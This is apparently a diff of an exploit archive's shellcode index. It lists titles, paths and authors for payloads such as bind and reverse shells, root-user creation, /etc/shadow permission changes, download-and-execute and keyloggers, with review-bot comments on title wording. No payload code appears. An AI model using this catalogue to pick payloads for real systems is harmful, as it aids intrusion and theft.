17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Netcat BindShell Port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
17323,platforms/windows/shellcode/17323.c,"Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
17323,platforms/windows/shellcode/17323.c,"Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0
17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0
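Review bot: the renamed 14234 row keeps the stray leading "125" in its title ("Linux - 125 Bind Port 6778 XOR Encoded Polymorphic Shellcode (125 bytes)"); it only repeats the "(125 bytes)" size suffix and reads like a leftover from the original submission, so drop it and let the title read `Linux - Bind Port 6778 XOR Encoded Polymorphic Shellcode (125 bytes)`. In the same hunk, 16026 becomes "31337 Portbind + fork" while the other renamed rows put the port after the noun ("Bindshell Port 2525", "Bind Shell Port 64533", "Bindshell Port 0x1337"); "Portbind Port 31337 + fork" would keep one convention.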
@ -15924,7 +15931,7 @@ id,file,description,date,author,platform,type,port
18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0
18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd",2011-12-31,pentesters.ir,lin_x86,shellcode,0
18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0
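Review bot: the renamed 18226 row only capitalises "Connectback" and leaves the port in a trailing lower-case parenthetical, "Connectback Shellcode (port 0x7a69) (168 bytes)", whereas the other connect-back renames in this patch fold the port into the title ("Netcat Connectback Port 8080"). Moving it the same way, `Linux/MIPS - Connectback Port 0x7a69 Shellcode (168 bytes)`, would also remove the double parenthetical at the end.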
@ -15935,34 +15942,34 @@ id,file,description,date,author,platform,type,port
21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell Port 4444 Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse Shell (192.168.1.177:31337) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0
40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind Shell TCP 4444 Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
33836,platforms/windows/shellcode/33836.txt,"Windows - Add Admin User _BroK3n_ Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
33836,platforms/windows/shellcode/33836.txt,"Windows - Add Administrator 'BroK3n' Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0
34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User _ALI_ & Execute /bin/bash (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User 'ALI' & Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent & Alphanumeric execve(_/bin/sh\0__NULL_NULL); Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0
35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0
35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind Port 4444/TCP Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect Shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0
35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0
35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Add Administrator 'ALI' & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0
35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Add Administrator 'ALI' & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0
35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0
36411,platforms/win_x86/shellcode/36411.txt,"Windows XP x86-64 - Download & execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86,shellcode,0
36411,platforms/win_x86-64/shellcode/36411.txt,"Windows XP x86-64 - Download & Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86-64,shellcode,0
36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
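Review bot: the 36411 row changes more than its title: the file column moves from `platforms/win_x86/shellcode/36411.txt` to `platforms/win_x86-64/shellcode/36411.txt` and the platform column from `win_x86` to `win_x86-64`. Editing files.csv alone leaves that path dangling, so confirm the file rename is part of the same commit; the new placement is otherwise the right one, since the title says "Windows XP x86-64" and the other x64 rows in this hunk (40890, 35794) already live under win_x86-64.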
@ -15971,14 +15978,14 @@ id,file,description,date,author,platform,type,port
36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Obfuscated map google.com to 127.1.1.1 Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - Obfuscated execve(_/bin/sh_) Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell Port 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0
36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0
36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
36780,platforms/win_x86/shellcode/36780.c,"Win32/XP SP3 - Restart computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
36781,platforms/lin_x86/shellcode/36781.py,"Linux/x86 - custom execve-Shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0
36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
@ -16005,24 +16012,24 @@ id,file,description,date,author,platform,type,port
37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0
37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0
37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0
37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0
38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode,0
38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - Bind Port 4444/TPC Null-free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell Port 31173 with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0
38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - Polymorphic execve Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0
38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0
38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0
39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP Port Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind Port 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - TCP Reverse Shell with Password Prompt Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
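Review bot: the renamed 38126 title carries the "TPC" typo over from the old row ("Bind Port 4444/TPC"); since the row is being rewritten anyway it should read "4444/TCP", matching 35586 and 39151 in this patch. The same row spells "Null-free" with a lower-case f while the other renames in this hunk (37758, 38065, 38959) settle on "Null-Free"; pick one spelling for all of them.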
@ -16030,32 +16037,32 @@ id,file,description,date,author,platform,type,port
39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download & Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
|
||||
39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Polymorphic Execve-Stack Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
|
||||
39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
|
||||
39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
|
||||
39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
|
||||
39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - Bindshell Port 5600 Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - Bindshell Port 5600 Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() / SetFileAttributesA() / WinExec() / ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
|
||||
39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP Port 1472 (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
|
||||
39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind Port 1472/TCP (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
|
||||
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0
|
||||
39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0
|
||||
39754,platforms/win_x86/shellcode/39754.txt,"Win32 .Net Framework - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0
|
||||
39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0
|
||||
39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0
|
||||
39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
|
||||
39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
|
||||
39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null-Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
|
||||
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
|
||||
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
